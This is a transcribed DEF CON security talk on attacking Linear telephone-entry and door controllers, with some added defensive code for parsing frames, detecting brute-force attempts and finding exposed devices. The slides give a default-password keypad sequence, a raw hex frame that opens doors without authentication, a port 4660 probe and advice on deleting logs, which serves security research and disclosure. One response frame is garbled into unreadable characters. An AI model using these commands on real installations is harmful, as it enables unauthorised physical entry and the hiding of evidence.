Are We Really Safe?

HACKING ACCESS CONTROL SYSTEMS


Dennis Maldonado

» Security Consultant @ KLC Consulting
» Twitter: @DennisMald
» Houston Locksport Co-founder
  http://www.meetup.com/Houston-Locksport/
» Rebooting HAHA! (Houston Area Hackers Anonymous)


Agenda

» Physical Access Control Systems
» Linear Commercial Access Control Systems
» Attacks
  » Local
  » Remote
  » Demo/Tools
» Device Enumeration Techniques
» Recommendations


Physical Access Control Systems

Physical Access Control
What do they do?

» Limiting access to a physical location/resource
» Secure areas using:
  » Doors
  » Gates
  » Elevator floors
  » Barrier arms


Physical Access Control
How do they work?

» Access control systems
  » Keypad entry (entry/directory codes)
  » Telephone entry
  » Radio receivers for remotes
  » Proximity cards (RFID)
  » Swipe cards
  » Sensors


Where are they used?

» Use cases:
  » Gated communities
  » Parking garages
  » Office buildings
  » Apartments
  » Commercial buildings
  » Hotels/Motels
  » Recreational facilities
  » Medical facilities


» Doorking
» Chamberlain
» LiftMaster
» Nortek Security & Control/Linear Controllers
» Linear Access

[Photo: a Linear Access keypad; its label reads "3 FAILED ATTEMPTS SYSTEM WILL LOCK" and "IN CASE OF FIRE USE NEAREST EXIT"]

Linear Commercial Access Control


Nortek Security & Control/Linear Controllers

» Linear Access
  » AM3Plus
  » AE1000Plus
  » AE2000Plus

Linear Controller

» Commercial Telephone Entry System
» Utilizes a telephone line
» Supports thousands of users
» Networked with other controllers
» Can be configured/controlled through a PC
  » Serial connection
Linear — TCP/IP

» Convenient and cost effective
» AM-SEK Kit (Serial-to-TCP), Model: AM-SEK, Order #: ACP00964
» Converts serial to Ethernet
» Allows management over the TCP/IP network
» Allows for remote management (over the internet)

AM-SEK Kit includes:
» Software CD & Quick Start
» Ethernet cable
» Power adapter
» Serial cable
» LIN-501C Serial-to-Ethernet Module

Linear — Typical Installation

[Diagram: Router/Switch on 192.168.0.0/24. The LIN-501C Serial-to-TCP module at 192.168.0.32:4660 is connected by Ethernet cable to the LAN and by serial cable to the AE1000Plus Controller; the Management PC is at 192.168.0.40.]

[Manufacturer figure: "Typical installation with the LIN-501C module functioning as the interface between the Plus panel and the installation's local area network." The LIN-501C (10/100 Base-T Ethernet) sits between the telephone entry or access control system and the installation's local area network; the AXNET network connects up to 7 more Plus panels on an AB2000 network.]
Software - AccessBase2000

» Add/remove users
  » Entry codes
  » Directory codes
  » Cards
  » Transmitters
» Manually toggle relays
» View log reports
» Communicates through serial
» Requires a password to authenticate

[Screenshot: AccessBase2000 toolbar help. The readable button descriptions cover: displaying the toolbar information screen; viewing individual cardholders and suspending or declaring credentials lost; real-time monitoring and control of the installation (door status, manually opening and closing doors, viewing alarms); displaying event logs from the database; connecting the AccessBase 2000 program to the installation; making a backup copy of the installation database and restoring the database from one; setting and synchronizing the installation time and date to the host computer's clock; collecting all event logs from the installation controller (you must be online to use this function); and generating and sending data to the installation, where a button that is not grayed out means new data is queued to be sent.]
[Screenshot: AccessBase2000 network setup dialog. Fields: "Name for the network: My Network", "Password: 123456", "Enable Network", "Disconnect after programming"; time programming ("Enable daylight savings", "Hours offset from PC clock: 0"); "How to connect to network": connect using COM3, or phone number with country code "United States [1]"; an Anti-PassBack Devices table with Name, Type and Direction columns.]

[Screenshot: AccessBase2000 cardholder view (File / View / Setup / Help; status "Not Connected"; Net: My Network). Cardholder sets: "All Access [2]" containing "Dennis" and "Billy Bob", "No Access", and "New Cardholder set [1]". The cardholder form holds first/middle/last name, street ("123 Fake St"), city/state/zip code, home and work phone, expiration ("Never expires"), and credential tabs: Transmitters (assign transmitter, transmitters assigned, surrender transmitter, transmitter status Suspended/Lost, assign new individual transmitter), Cards, Entry Codes, Directory Codes, plus "Reset Anti-passback Status" and Apply.]

PC to Controller Communication

» Request
  » 5AA5000A1105010008000000CB97
  » 5AA5000A11013635343332319A71
» Response
  » Acknowledged:
    5AA50004110C4625
    5AA50005110D024C23
  » Not Acknowledged:
    5АА5О ДИВНІ ОРО2 4 С2 З
  » Invalid Checksum:
    5AA50005110D017EB8
  » No response (not authenticated)

» String is hex encoded
» Frame layout: Packet Header | Data Length (minimum/maximum) | Net Node | Command | Data | Checksum (hex)
» Poll Status = 02
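The frames above all follow the layout in the slide's table (packet header, data length, net node, command, data, checksum). The decoder below is an added example, not code from the talk or from Linear: it splits a hex frame into those fields, checks that the length field matches the number of bytes that follow it, and labels the commands that appear on the slide. The field offsets, the reading of the length field as a count of everything after it, the command meanings, and the `parse_frame` and `describe` names are assumptions drawn from the sample frames; the checksum algorithm is not on the slide, so the checksum is carried but not verified.

```python
"""Decoder for the framing shown on the 'PC to Controller Communication' slide.

Added example (not the vendor's or the talk's code). Field layout per the
slide's table: 2-byte header 5AA5, 2-byte length, 1-byte net node, 1-byte
command, variable data, 2-byte checksum. The command meanings and the rule
that the length counts every byte after the length field are assumptions
inferred from the sample frames.
"""
from dataclasses import dataclass

# Frames copied from the slide (used here as a constructed test corpus).
SAMPLE_FRAMES = {
    "request_relay":    "5AA5000A1105010008000000CB97",
    "request_password": "5AA5000A11013635343332319A71",
    "ack_short":        "5AA50004110C4625",
    "ack_status":       "5AA50005110D024C23",
    "invalid_checksum": "5AA50005110D017EB8",
}

HEADER = b"\x5a\xa5"


@dataclass(frozen=True)
class Frame:
    length: int
    node: int
    command: int
    data: bytes
    checksum: int  # carried value only; the algorithm is not on the slide


def parse_frame(hex_string: str) -> Frame:
    """Split a hex-encoded frame into its fields and sanity-check the length.

    Raises ValueError for anything that does not fit the layout, which is what a
    monitoring parser wants: a malformed frame should be visible, not skipped.
    """
    raw = bytes.fromhex(hex_string.strip())
    if len(raw) < 6 or raw[:2] != HEADER:
        raise ValueError("missing 5AA5 header")
    length = int.from_bytes(raw[2:4], "big")
    body = raw[4:]
    # Assumption from the samples: length = node + command + data + checksum,
    # i.e. every byte after the length field itself.
    if length != len(body):
        raise ValueError(f"length field {length} but {len(body)} bytes follow")
    if length < 4:
        raise ValueError("frame too short for node, command and checksum")
    return Frame(
        length=length,
        node=body[0],
        command=body[1],
        data=body[2:-2],
        checksum=int.from_bytes(body[-2:], "big"),
    )


def describe(frame: Frame) -> str:
    """Human-readable label for the commands seen on the slide (assumed meanings)."""
    if frame.command == 0x01:
        # The slide's password request carries the password as ASCII digits.
        password = frame.data.decode("ascii", errors="replace")
        return f"password request (node 0x{frame.node:02X}), {len(password)}-char password"
    if frame.command == 0x05:
        return f"controller command (node 0x{frame.node:02X}), data {frame.data.hex().upper()}"
    if frame.command == 0x0C:
        return "acknowledged"
    if frame.command == 0x0D:
        # From the slide: data 02 = acknowledged (poll status), data 01 = invalid checksum.
        return {b"\x02": "acknowledged (status 02)", b"\x01": "invalid checksum"}.get(
            frame.data, f"status {frame.data.hex().upper()}")
    return f"unknown command 0x{frame.command:02X}"


if __name__ == "__main__":
    for name, hex_frame in SAMPLE_FRAMES.items():
        f = parse_frame(hex_frame)
        print(f"{name:18} cmd=0x{f.command:02X} data={f.data.hex().upper():14} -> {describe(f)}")
```

Decoding the second request shows that its data field is six ASCII digits, which is the one thing a monitor on port 4660 has to recognise before it can count password attempts per source.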


Attacks

LOCAL AND REMOTE ATTACKS

So how do we target these controllers?

» Physical Access
  » Local Programming
  » Serial port inside the controller

[Photo: controller keypad display showing "ENTER FUNCTION:"]

Local Attacks

AE-500 — Default Password

» Hold 0 and 2 on the keypad
» Type the default password: 123456#  (display: "ENTER CODE? 009")
» Input the commands to add a new entry code
  » 31#9999#9999#99#
» Type in your new code (9999)
» Access Granted!

[Diagram of the keypad sequence: Enter Programming Mode → Enter New Entry Code → Confirm → Exit Programming Mode]

[Photo: keypad operating-instructions label: 1. press and release the directory key to view the directory; 2. hold the key to scroll forward; 3. hold the key to scroll backward; 4. locate the desired name in the directory; 5. enter the directory code to call the resident; if no answer, press the hang-up key]


Master Key

» Same key for all AE1000plus, AM3plus controllers
» Purchase them from a supplier or on eBay
» Or just pick the lock
» Full access to the device


Physical Access

» Manual relay latch buttons
  » Toggle relay
  » Lock their state
» Programming buttons
  » Program device locally
» Active phone line
» Serial connection to the controller

[Photo: controller board, "PROCESSOR" label]

Tamper Monitoring?

» Magnetic tamper switch inside enclosure
» No active alerts
» Can be bypassed by placing a magnet on the outside of the enclosure


So how do we target these controllers?

» Physical Access
  » Local Programming
  » Serial port inside the controller
» Internal Network Access
  » IP of Serial to TCP device
  » TCP Port 4660
» External Network Access
  » IP of Serial to TCP device
  » TCP Port 4660 open to the internet

[Diagram: the LIN-501C typical-installation figure again, annotated with the internal address 192.168.0.32:4660 and the external address 74.12.x.x:4660]


Remote Attacks

Demo

Brute-force attack

» No rate limiting
» No password lockout
» Small key space
  » Exactly 6 characters
  » Numeric only
» Scriptable

Demo output (excerpt):
Guess: 123456
Guess: 654321
Guess: 980000
Guess: 000000
Guess: 111111
Guess: 222222
Guess: 444444
Guess: 555555
Guess: 666666

Demo

No Password Necessary

» Authentication not enforced!
» Send unauthenticated commands
» Any commands will execute
» May not get any confirmation data
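Both weaknesses above (unlimited password guesses, and commands accepted without any authentication) leave a footprint on TCP 4660 that a defender can watch for if the serial-to-TCP link is mirrored or logged. The script below is an added example, not part of the talk or of ACAT: it runs two heuristics over a constructed per-frame log (timestamp, source address, hex frame sent to the controller). The command-byte offset, the 0x01 (password request) and 0x05 (controller command) meanings, the window and threshold values, and the `analyse` and `Alert` names are assumptions; apart from the two frames taken from the slides, the log lines are made up and carry dummy checksums.

```python
"""Detection heuristics for client traffic to a serial-to-TCP controller port.

Added example, not from the talk or the ACAT tool. Input: a constructed log
with one line per frame, client-to-controller direction only:
    <epoch seconds> <source ip> <hex frame>
Flags (1) a burst of password requests from one source, which the controller
itself never rate-limits or locks out, and (2) controller commands from a
source that never presented a password at all. The frame layout (command
byte at offset 5) and command meanings are assumptions from the slide frames.
"""
from collections import defaultdict, deque
from dataclasses import dataclass, field

# Constructed sample log. The 192.168.0.40 and 192.168.0.99 frames are the
# slide's own; the 192.168.0.77 frames are made up and use dummy checksums.
SAMPLE_LOG = """\
1437800000 192.168.0.40 5AA5000A11013635343332319A71
1437800002 192.168.0.40 5AA5000A1105010008000000CB97
1437800100 192.168.0.77 5AA5000A11013132333435361234
1437800101 192.168.0.77 5AA5000A11013132333435371234
1437800102 192.168.0.77 5AA5000A11013132333435381234
1437800103 192.168.0.77 5AA5000A11013132333435391234
1437800104 192.168.0.77 5AA5000A11013132333436301234
1437800500 192.168.0.99 5AA5000A1105010000080000E88D
"""

PASSWORD_REQUEST = 0x01    # assumed: command byte of the slide's password request
CONTROLLER_COMMAND = 0x05  # assumed: command byte of the slide's relay-trigger frame
WINDOW_SECONDS = 60        # arbitrary defaults; tune to the site's operator activity
BRUTE_FORCE_THRESHOLD = 5


@dataclass
class Alert:
    kind: str
    source: str
    timestamp: int
    detail: str


@dataclass
class SourceState:
    recent_password_requests: deque = field(default_factory=deque)
    presented_password: bool = False
    brute_force_reported: bool = False


def command_byte(hex_frame: str) -> int:
    # Header (2) + length (2) + net node (1) precede the command byte.
    return bytes.fromhex(hex_frame)[5]


def analyse(log_text: str) -> list[Alert]:
    """Return alerts in log order; one brute-force alert per source."""
    alerts: list[Alert] = []
    states: dict[str, SourceState] = defaultdict(SourceState)
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts_text, source, hex_frame = line.split()
        ts = int(ts_text)
        state = states[source]
        cmd = command_byte(hex_frame)
        if cmd == PASSWORD_REQUEST:
            state.presented_password = True
            window = state.recent_password_requests
            window.append(ts)
            # Drop attempts older than the sliding window.
            while window and ts - window[0] > WINDOW_SECONDS:
                window.popleft()
            if len(window) >= BRUTE_FORCE_THRESHOLD and not state.brute_force_reported:
                state.brute_force_reported = True
                alerts.append(Alert("password-bruteforce", source, ts,
                                    f"{len(window)} password requests within {WINDOW_SECONDS}s"))
        else:
            if not state.presented_password:
                alerts.append(Alert("unauthenticated-command", source, ts,
                                    f"command 0x{cmd:02X} with no prior password request"))
            if cmd == CONTROLLER_COMMAND:
                alerts.append(Alert("relay-command", source, ts,
                                    "controller command frame; compare with expected operator activity"))
    return alerts


if __name__ == "__main__":
    for a in analyse(SAMPLE_LOG):
        print(f"{a.timestamp} {a.source:14} {a.kind:24} {a.detail}")
```

The second heuristic is the important one for this controller: because the device executes commands whether or not a password was ever sent, the absence of a password request from a source is itself the signal, and nothing in the controller's own log will record it.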


[Diagram: Hacker → raw connection → AE1000Plus Controller]


Open Doors Remotely

» Send one simple command
  » 5AA5000A1105010000080000E88D
» Triggers a relay for 2 seconds, thus opening a door or gate
» Great for movie style scenes

[Diagram: Hacker → raw connection carrying 5AA5000A1105010000080000E88D → AE1000Plus Controller]


Lock Doors Open/Closed

» Keeps doors/gates open or closed
» Will not respond to user input (RFID cards, remotes, etc.)
» Persists until manually unlocked or rebooted


Delete Logs From The Controller

» Controller keeps logs of events
» Downloading logs deletes them from the controller
» Hide evidence of entry or tampering

[Screenshot: AccessBase2000 event log with columns Date & Time | Door | Modifier | Event. Entries run from 07/24/15 17:19 through 07/25/15 02:24 on [A1A] Door 1, [A1B] Door 2, [A1D] Door 4 and [A] My Network, with modifiers "Dennis", "Panel operat..." and "Request to e...". Events shown: "Single xmtr [46150], Access granted", "Open request", "Network connection error", repeated "Tamper switch open" / "Tamper switch closed" pairs, and "Reset/Power Up".]


Change the Password

» Upload configuration settings
» Change password without needing the previous password
» Normal functionality remains
» Upload other configuration changes

[Screenshot: AccessBase2000 settings tabs (Names | Relays | Modem | Passwords | Remote Device | Obstacle Transmitters | Elevator Control | General). Passwords tab: Remote Access: 123456, Priority Access: 123456; Apply / Cancel. Status "Not Connected", Net: My Network, "Disconnect after programming".]


Denial of Service

» Fake database update will disable controller connected to or rebooted
» Overwrite device firmware
» Lock relays to prevent access

ACAT - Access Control Attack Tool
Demo


Locating Controllers

Device Enumeration Techniques

» Scan the network
  » Look for any COM port redirectors
  » Default port = TCP 4660
» Send broadcast packet to UDP 55954
  » Devices will respond
» Send a password request string to port 4660
  » 5AA5000A11013635343332319A71
  » Responses:
    » 5AA50004110C4625
    » 5AA50005110D024C23


Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2015-07-31 09:56
Nmap scan report for 10.0.0.12
Host is up (0.0145s latency).
Not shown: 65529 closed ports
PORT      STATE SERVICE    VERSION
23/tcp    open  telnet
80/tcp    open  http       Web Server 1.1
1111/tcp  open  tcpwrapped
4660/tcp  open  telnet     Aaxeon DevoLinx COM port redirector
4670/tcp  open  tcpwrapped
55952/tcp open  tcpwrapped

[Diagram: broadcast discovery; the Client sends a broadcast and the devices respond]


Demo 
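The Nmap output above is as useful to the defender as to the attacker: every host that shows TCP 4660 open with the DevoLinx COM port redirector banner is a controller reachable over the network, and the same scan run on your own ranges tells you how many there are and whether any sit on an internet-facing segment. The parser below is an added example, not the author's Nmap script, that reads saved Nmap normal-format output and lists such hosts. The sample report is constructed to mirror the slide's scan; the second and third hosts, and the `parse_nmap` and `find_redirectors` names, are assumptions.

```python
"""Find serial-to-TCP redirectors in saved Nmap normal (-oN) output.

Added example; not from the talk. It looks for the signature the slide shows
on the controller's LIN-501C module: TCP 4660 open and fingerprinted as a COM
port redirector. The first host below mirrors the slide's scan; the other two
hosts are invented to exercise the no-match and unidentified-banner cases.
"""
import re

SAMPLE_NMAP_OUTPUT = """\
Nmap scan report for 10.0.0.12
Host is up (0.0145s latency).
Not shown: 65529 closed ports
PORT      STATE SERVICE    VERSION
23/tcp    open  telnet
80/tcp    open  http       Web Server 1.1
1111/tcp  open  tcpwrapped
4660/tcp  open  telnet     Aaxeon DevoLinx COM port redirector
4670/tcp  open  tcpwrapped
55952/tcp open  tcpwrapped

Nmap scan report for 10.0.0.20
Host is up (0.0020s latency).
Not shown: 65533 closed ports
PORT    STATE SERVICE VERSION
22/tcp  open  ssh
80/tcp  open  http

Nmap scan report for 10.0.0.31
Host is up (0.030s latency).
PORT     STATE SERVICE VERSION
4660/tcp open  unknown
"""

REDIRECTOR_PORT = 4660
HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
PORT_RE = re.compile(r"^(\d+)/tcp\s+(\S+)\s+(\S+)\s*(.*)$")


def parse_nmap(text):
    """Return {host: [(port, state, service, version), ...]} from -oN output."""
    hosts, current = {}, None
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if m:
            current = m.group(1)
            hosts[current] = []
            continue
        m = PORT_RE.match(line)
        if m and current is not None:
            port, state, service, version = m.groups()
            hosts[current].append((int(port), state, service, version.strip()))
    return hosts


def find_redirectors(text):
    """Hosts with TCP 4660 open, with a confidence note taken from the banner."""
    findings = []
    for host, ports in parse_nmap(text).items():
        for port, state, service, version in ports:
            if port == REDIRECTOR_PORT and state == "open":
                confirmed = "com port redirector" in version.lower()
                findings.append((host, "confirmed redirector" if confirmed
                                 else "port open, banner not identified"))
    return findings


if __name__ == "__main__":
    for host, note in find_redirectors(SAMPLE_NMAP_OUTPUT):
        print(f"{host:15} {note}")
```

A host reported as "port open, banner not identified" still deserves a look: the slide's own scan labels 4660 as telnet with the redirector version string only because service detection ran, so a quick scan without -sV will show every controller in the second form.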


Recommendations

» Always change the default password
» Change physical locks
» Use a direct serial connection
» If networked, utilize authentication
» Resist opening the controller to the internet

Final Thoughts

» Other vendors
» Ongoing research
» Tool - more work is needed
  » Tool located on https://github.com/linuz/Access-Control-Attack-Tool
  » It's currently just a prototype
  » Continue updating it/take it out of "PoC mode"
» Working on an Nmap script
» Slides uploaded to SlideShare
  www.slideshare.net/DennisMaldonado5

Questions?

» If you have any questions, you can:
  » Twitter: @DennisMald
  » Find me here at DEFCON23
  » Email me at: dmaldonado@klcconsulting.net